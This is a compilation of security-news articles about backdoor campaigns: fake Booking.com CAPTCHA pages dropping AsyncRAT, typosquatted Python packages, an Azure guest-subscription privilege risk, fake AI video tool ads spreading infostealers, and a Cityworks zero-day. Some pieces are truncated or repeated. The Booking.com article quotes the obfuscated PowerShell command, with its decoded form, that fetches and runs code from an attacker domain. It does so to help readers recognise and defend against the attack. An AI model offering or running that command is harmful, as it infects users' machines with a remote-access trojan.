Sophos researchers found this operation has similarities or connections to many other campaigns targeting GitHub repositories dating back to August 2022.

Backdoored Malware Reels in Newbie Cybercriminals

We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha prompt

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device

If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users

The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning

“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase   at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

**IOCs**

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter\[.\]com

(booking.)badgustrewivers.com\[.\]com

(booking.)property-paids\[.\]com

(booking.)rewiewqproperty\[.\]com

(booking.)extranet-listing\[.\]com

(booking.)guestsalerts\[.\]com

(booking.)gustescharge\[.\]com

kvhandelregis\[.\]com

patheer-moreinfo\[.\]com

guestalerthelp\[.\]com

rewiewwselect\[.\]com

hekpaharma\[.\]com

bkngnet\[.\]com

partnervrft\[.\]com

Malwarebytes blocks the download from bkngnet\[.\]com

**How to stay safe**

There are a few things you can do to protect yourself from falling victim to these and similar methods:

*   Do not follow instructions provided by a website you visited without thinking it through.
*   Use an active anti-malware solution that blocks malicious websites and scripts.
*   Use a browser extension that blocks malicious domains and scams.
*   Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Victims risk AsyncRAT infection after being redirected to fake Booking.com sites 

Checkmarx uncovers cross-ecosystem attack: fake Python and NPM packages plant backdoor on Windows and Linux, enabling data theft plus remote control.

New research from Checkmarx Zero has unveiled a unique malicious software campaign that targets Python and NPM users on both Windows and Linux systems.

Security researcher Ariel Harush at Checkmarx Zero has identified this troubling new trend in cyberattacks. According to their research, shared with Hackread.com, attackers are using typosquatting and name-confusion techniques to trick users into downloading harmful software.

What makes this campaign especially unusual is its _cross-ecosystem_ approach. The malicious packages, uploaded to PyPI (Python Package Index), mimic the names of legitimate software from two different programming ecosystems: colorama (a popular Python tool for adding color to text in terminals) and colorizr (a similar JavaScript package found on NPM, the Node Package Manager). This means an attacker is using a name from one platform to target users of another, a rarely seen tactic.

The packages uncovered by Checkmarx Zero carried highly risky payloads, designed to give attackers lasting remote access and remote control over both desktops and servers. This allows them to “harvest and exfiltrate sensitive data,” meaning they can steal important information.

On Windows systems, the malware even attempts to bypass antivirus software to avoid being detected. Checkmarx also linked some of the Windows payloads to a GitHub account: githubcom/s7bhme.

For Linux users, the malicious packages were found to contain advanced backdoors that could establish encrypted connections, steal information, and maintain a hidden, long-term presence on affected systems.

The campaign, likely designed to attack specific targets, is currently untraceable due to the lack of clear attribution data, leaving it unclear whether it is linked to a well-known adversary.

Thankfully, these specific malicious packages have been removed from public software repositories, which has limited their immediate potential for causing damage. Although the immediate threat has been contained, Checkmarx advises organizations to be ready for similar attacks.

Query results for ‘coloramapkgs’ retrieved via the Checkmarx Threat Intelligence API

“By combining typo-squatting and related name confusion attacks, cross-ecosystem baiting, and multi-platform payloads, this attack serves as a reminder of how opportunistic and sophisticated open-source supply chain threats have become,” Checkmarx researchers noted in their blog post.

Researchers suggest checking all active and ready-to-use application code for any signs of these malicious package names. It is also crucial to inspect private software storage areas, like Artifactory, to remove any harmful packages and prevent their future installation.

Furthermore, companies should ensure that these types of dangerous packages aren’t installed on developer computers or in testing environments. These steps are vital for defending against such sophisticated open-source supply chain attacks.

Backdoors in Python and NPM Packages Target Windows and Linux

Thousands of ASUS routers have been infected and are believed to be part of a wide-ranging ORB network affecting devices from Linksys, D-Link, QNAP, and Araknis Network.

New Botnet Plants Persistent Backdoors in ASUS Routers

Researchers reveal how guest accounts with billing roles can create Azure subscriptions inside external tenants, gaining unexpected Owner access and opening hidden privilege risks.

Cybersecurity researchers at BeyondTrust are warning about a little-known but dangerous issue within Microsoft’s Entra identity platform. The issue isn’t some hidden bug or overlooked vulnerability; it’s a feature, built into the system by design, that attackers can exploit.

The issue is that guest users invited into an organization’s Azure tenant can create and transfer subscriptions inside that tenant without having any direct admin privileges there. Once they do, they gain “Owner” rights over that subscription, opening up a surprising set of attack opportunities that many Azure administrators might never have considered.

****What’s Happening Behind the Scenes****

Organizations frequently invite external partners or collaborators into their Azure environments as “guest users.” Typically, these guests are assigned limited access to prevent damage if their accounts are compromised. But BeyondTrust’s findings shared with Hackread.com, reveal that under certain conditions, these guests can spin up entire Azure subscriptions inside the host tenant, even without explicit permissions in that environment.

How? It all comes down to Microsoft’s billing permissions. If the guest holds specific billing roles in their home tenant (for example, they created a free trial account), they can use that authority to create subscriptions and then move them into any other tenant they are invited to. By doing so, they effectively become “Owners” of those subscriptions, gaining broad control over resources inside the targeted tenant.

Microsoft has confirmed that this is intended behaviour, pointing out that these subscriptions stay on the guest’s bill and that there are existing (but non-default) controls to prevent such transfers. Still, the security implications are substantial.

****The Privilege You Didn’t See Coming****

Once a guest becomes a subscription Owner inside your Azure tenant, they unlock several advanced capabilities including Identifying who’s really in charge, disabling security monitoring, creating persistent backdoors and abusing device trust

These attack paths exist because billing roles and resource permissions operate on separate tracks, creating an overlap that isn’t covered by typical role-based access control (RBAC) models.

**Real-World Attack Steps**

BeyondTrust researchers demonstrated how an attacker could exploit this issue in practice. An attacker could start by setting up their own Azure tenant using a free trial, which automatically gives them billing authority.

Once they are invited as a guest into a target tenant, they can log into the Azure portal and create a new subscription using advanced settings, selecting the target tenant as the destination. Without ever needing admin approval in that tenant, the attacker gains full Owner access over the new subscription, opening the door to privilege abuse techniques.

> _“The feature Microsoft has created here makes sense: some organizations have many tenants, and there are use cases where users with one home directory need to create subscriptions in others they are simply a guest in. The problem lies in the default behavior: if this capability were opt-in, meaning guests were blocked from creating subscriptions by default, the risk would be significantly reduced, and this wouldn’t pose a security concern.”_
> 
> Simon Maxwell-Stewart, Sr Data Engineer – BeyondTrust

****Microsoft’s Position****

Microsoft has stated that this is intended behaviour, meant to support complex multi-tenant setups where guests sometimes need to create resources. They provide subscription policies that can block these transfers, but these controls are off by default.

For cybersecurity teams, this means the risk remains active until they take clear action. BeyondTrust recommends several key steps to reduce exposure including enabling subscription policies that block guest-led transfers, regularly auditing guest accounts and removing any that are unused or unnecessary.

To prevent attackers from using virtual machines or devices for further attacks, closely monitor subscriptions for unusual or unexpected guest-created resources, and carefully review dynamic group rules and device trust policies.

Microsoft Entra Design Lets Guest Users Gain Azure Control, Researchers Say

Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for…

Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for fake AI video tools, leading to stolen credentials and credit card information.

Mandiant Threat Defense has uncovered a widespread cybercrime operation preying on the public’s excitement for new AI tools. A group known as UNC6032, believed to be based in Vietnam, is tricking people with fake social media ads that look like they’re promoting popular AI video generators such as Luma AI and Canva Dream Lab.

According to Mandiant’s research, shared with Hackread.com, UNC6032 has been running misleading ads on platforms like Facebook and LinkedIn since mid-2024. These ads direct users to fake websites that appear to offer AI video generation services.

However, these sites secretly download harmful software, including infostealers and backdoors, which steal sensitive information like login details and personal data. The stolen data is likely sold on illegal online markets.

This type of attack is a major concern for everyone, from individuals to large companies. In fact, according to Mandiant’s M-Trends 2025 report, stolen credentials are the second-highest initial way cybercriminals get into systems. Mandiant has found thousands of these ads, reaching millions of users, and believes similar campaigns are active on other social media sites.

For instance, one specific attack that Mandiant investigated started with a Facebook ad for Luma Dream AI Machine. When a user clicked on “Start Free Now,” they were led through a series of steps mimicking a real AI video creation process.

After a loading bar, a Download button appeared, which then installed the malicious software instead of a video. The files used a trick with hidden characters and a fake .mp4 icon to appear harmless, but they were actually dangerous executable files.

Malicious Facebook ads on Facebook and LinkedIn (Image credit: Mandiant)

The malicious software used in these attacks, which Mandiant tracks as STARKVEIL, is a complex program written in Rust. It may display fake error messages to trick users into reopening the program. The software then drops other dangerous tools like XWORM, FROSTRIFT backdoors, and the GRIMPULL downloader.

These tools allow attackers to control the computer, steal more information, record keystrokes, and check for security software. GRIMPULL, for example, can download and run the Tor browser to connect to criminals’ hidden servers. XWORM even sends the stolen information to the attackers via Telegram.

According to Mandiant Threat Defense’s blog post, the company is collaborating with Meta and LinkedIn to fight this campaign. Although Meta has removed many of these ads, new ones are appearing daily. This ongoing threat necessitates constant collaboration across the tech industry to protect users.

Yash Gupta, Senior Manager at Mandiant Threat Defense, warns that “well-crafted websites masquerading as legitimate AI tools can pose a threat to anyone… Users should exercise caution when engaging with seemingly harmless ads.”

It is a fact that AI tools are becoming popular, and cybercriminals will continue to exploit this interest. Users are advised to be cautious when trying out new AI tools and verify the website’s address before interacting.

Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers

Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.

Cybercriminals are taking advantage of the public’s interest in Artificial Intelligence (AI) and delivering malware via text-to-video tools.

According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors.

Links to the malicious websites were brought to the researchers’ attention by ads and links in comments on social media platforms. The researchers uncovered thousands of malicious ads on Facebook and LinkedIn—beginning in November 2024—that promote fake AI video generator tools such as “Luma AI,” “Canva Dream Lab,” and “Kling AI.”

To avoid detection, the group constantly rotates the domain used in the ads and creates new ads every day, while using both compromised and newly created accounts. The campaign operates through more than 30 websites that imitate popular legitimate AI tools.

Researchers identified the first payload as the Starkveil dropper (detected by Malwarebytes/ThreatDown) classified as Trojan.Crypt. The Trojan, written in Rust, requires users to run it twice to fully compromise their machines. After the first run, the malware displays an error window to trick victims into executing it again.

The dropper then deploys the XWorm (detected as Backdoor.XWorm) and Frostrift (detected as Trojan.Crypt) backdoors and the GRIMPULL downloader (also detected as Trojan.Crypt).

After it has fully compromised the system, this constellation of malware will harvest all kinds of data from the infected devices and send it to the cybercriminals using various methods of communication. For a full technical analysis of the malware, feel free to read the researchers’ report.

The researchers stated:

> “The temptation to try the latest AI tool can lead to anyone becoming a victim.”

So, it’s important to be aware of these campaigns and adopt ways to recognize and thwart them.

*   Be vigilant. Posts or ads with high numbers of views that promise free AI text-to-video tools are a red flag and should be examined carefully, especially if they prompt downloads of executable files, which could be disguised as videos.
*   Don’t trust unsolicited messages or ads promising unbelievable AI tools or free trials, especially if they pressure you to act quickly or provide personal information.
*   Run up-to-date and active protection to intercept these malware infections in the early stages, as well as detect and remove infostealer malware.
*   Use web protection in your browser that can recognize and block scams and malicious websites.
*   Don’t click on sponsored search results. Any other method to find a link to your coveted product is preferable over sponsored results, since criminals have demonstrated that it pays off to outbid the rightful owners.
*   Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers.
*   Scrutinize the provided URLs which might be constructed to look like the “real thing” but they might not be.
*   Only download AI software or tools from official, trusted sources or verified app stores.

For more actionable advice on how to spot scams, join our Facebook Live on June 3.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware 

Cisco Talos warns of active exploitation of a zero-day vulnerability (CVE-2025-0994) in Cityworks supposedly by Chinese hackers from…

Cisco Talos warns of active exploitation of a zero-day vulnerability (CVE-2025-0994) in Cityworks supposedly by Chinese hackers from the UAT-6382 threat group. Learn about the malware, affected organizations, and critical security patches.

Cisco Talos researchers have issued a critical alert regarding active cyberattacks targeting Trimble Cityworks, a widely used platform for managing public assets. According to Cisco Talos’ latest research, shared with Hackread.com, a sophisticated threat group, tracked as UAT-6382, is exploiting a newly discovered high-severity vulnerability CVE-2025-0994 in the system.

This vulnerability, having a CVSS score of 8.6, allows for remote code execution, meaning attackers can run their malicious programs on affected systems from afar. These attacks have been observed since January 2025 and primarily target local government organizations in the United States. Some attacks have already resulted in successful compromises.

The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have also released their warnings about this serious flaw. Reportedly, the vulnerability allows attackers to gain remote access and execute malicious code against Microsoft Internet Information Services web server without needing to authenticate. Cityworks vulnerability affects versions before 15.8.9 and Cityworks with Office Companion versions before 23.10.

Once inside, UAT-6382 quickly deploys _web shells_ like AntSword and chinatso/Chopper on the compromised web servers to maintain hidden access. They also use custom-made tools, including a Rust-based loader called TetraLoader to install more persistent malware such as Cobalt Strike and VSHell.

> _“Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning in January 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access.”_
> 
> Cisco Talos

****Chinese-Speaking Actors Identified****

Based on their methods and tools, Cisco Talos’ report suggests with high confidence that UAT-6382 is a group of “Chinese-speaking threat actors.” Evidence supporting this includes the Chinese language found in the web shells and the fact that MaLoader, the framework used to build TetraLoader, is also written in Simplified Chinese. This malware builder, which emerged in December 2024, allows operators to package malicious code into Rust-based programs like TetraLoader.

MaLoader Builder Interface (Source: Cisco Talos)

Researchers noted that upon gaining access, the attackers show a particular interest in systems related to utility management. Their initial actions involve scanning the compromised server to understand its setup, looking for specific directories related to Cityworks, and then quickly setting up their web shells. They also stage sensitive files for potential data theft and deploy backdoors using PowerShell commands to ensure long-term access.

****Understanding the Malware****

TetraLoader’s main function is to inject various payloads into legitimate processes, such as notepad.exe. These payloads can be Cobalt Strike beacons, which are widely used by attackers for command and control, or VShell stagers.

For your information, VShell is a GoLang-based remote access Trojan that allows attackers to manage files, run commands, take screenshots, and set up proxy services on infected systems. Like other tools used by this group, the VShell control panels also display Chinese text, indicating the operators’ proficiency in the language.

Cityworks has released security patches to address the CVE-2025-0994 vulnerability, urging users to update immediately. Organizations should monitor suspicious activity using Cisco Talos’ technical indicators of compromise (IOCs). Cisco Talos also recommend the use of security products like Cisco Secure Endpoint, Secure Firewall, and Umbrella to protect against such attacks.

Chinese Hackers Exploit Cityworks 0-Day to Hit US Local Governments

Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.

UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware

Threat hunters have exposed the tactics of a China-aligned threat actor called UnsolicitedBooker that targeted an unnamed international organization in Saudi Arabia with a previously undocumented backdoor dubbed MarsSnake.
ESET, which first discovered the hacking group's intrusions targeting the entity in March 2023 and again a year later, said the activity leverages spear-phishing emails using

Tag

#backdoor